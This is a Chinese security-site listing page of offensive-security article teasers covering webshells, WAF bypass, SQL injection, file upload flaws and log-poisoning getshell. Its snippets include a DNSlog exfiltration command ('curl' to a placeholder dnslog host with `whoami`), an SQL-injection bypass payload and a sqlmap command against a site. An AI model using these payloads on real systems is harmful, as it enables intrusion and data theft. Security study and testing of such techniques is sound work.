http - 第 109 | CN-SEC 中文网

代码审计

【代码审计】EasySNS_V1.6远程图片本地化导致Getshell

01前言ESPHP开发框架基础上开发而成的EasySNS极简社区为全新数据库架构和程序结构。本文以EasySNS_V1.6作为代码审计的目标，分享一个远程图片本地化导致Getshell的漏洞。02环境...

11月14日629 views评论

阅读全文

安全文章

记一次webshell的获取

首先祝大家节日快乐，给大家的礼物就是下文啦。本文转自：先知社区链接：https://xz.aliyun.com/t/6587 像往常一样闲来无事挖src，打开http://t.xxx.com.cn开局...

11月06日720 views评论

阅读全文

安全工具

蚁剑绕WAF进化图鉴

写在前面最近大家都在捣腾 0708，由于太菜，只好坐等大佬分析喽。也没处理 issue, 也没写东西。回去领了个证书，说实话提前预约，到场直接走流程，留下身后一堆怨毒的眼神这种感觉自己像VIP一样的待...

05月23日413 views评论

阅读全文

安全工具

蚁剑绕WAF进化图鉴

05月23日561 views评论

阅读全文

一句话爆破 python脚本

今天测试用了一下Tools 的这个python 脚本的，感觉也不错。收藏一下！ exploit: python one.py -f /home/passwword.txt -u ...

05月19日颓废's Blog730 views评论

阅读全文

SQL盲注漏洞利用工具

#! /usr/bin/env python # coding:utf-8 # -------------------------------------------------- # file_na...

05月19日颓废's Blog542 views评论

阅读全文

DNSlog攻击技巧

linux： curl http://xxx.dnslog.link/`whoami` ping -c 1 `whoami`.xxx.dnslog.link 如果碰到内容有空格（换...

05月19日颓废's Blog2,350 views评论

阅读全文

QHCMS任意文件上传漏洞

2. 将以下代码保存为.html，手动POST一个.php文件：

05月19日颓废's Blog817 views评论

阅读全文

颓废's Blog

实战入侵某赌博网

Sqlmap..py -u http://www.xxxx.com/History?id=xxx 从上图可以看到是存在注入点的。目标操作系统是Windows 2008 R2 or...

05月19日799 views评论

阅读全文

SQL注入绕过WAF的方法总结

基本/简单绕过方法： 1、注释符 http://www.0dayhack.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4…. 2、使用...

05月19日颓废's Blog627 views评论

阅读全文

颓废's Blog

利用Apache漏洞传马通过Apache日志获得shell进行getshell

1 创建文件包含漏洞网页，进入文件包含测试界面。在URL中提交GET参数“?ajest=test.php”，即可进行文件包含测试，查看结果的显示。

05月19日931 views评论

阅读全文

在线学习黑客技术的网站总结

1、bWAPP 免费和开源的web应用程序安全项目。它有助于安全爱好者及研究人员发现和防止web漏洞。地址：http://www.itsecgames.com/ 2、Damn Vulnerable ...

05月19日颓废's Blog1,051 views评论

阅读全文

【代码审计】EasySNS_V1.6远程图片本地化导致Getshell

记一次webshell的获取

蚁剑绕WAF进化图鉴

蚁剑绕WAF进化图鉴

一句话爆破 python脚本

SQL盲注漏洞利用工具

DNSlog攻击技巧

QHCMS任意文件上传漏洞

实战入侵某赌博网

SQL注入绕过WAF的方法总结

利用Apache漏洞传马通过Apache日志获得shell进行getshell

在线学习黑客技术的网站总结

在线咨询

微信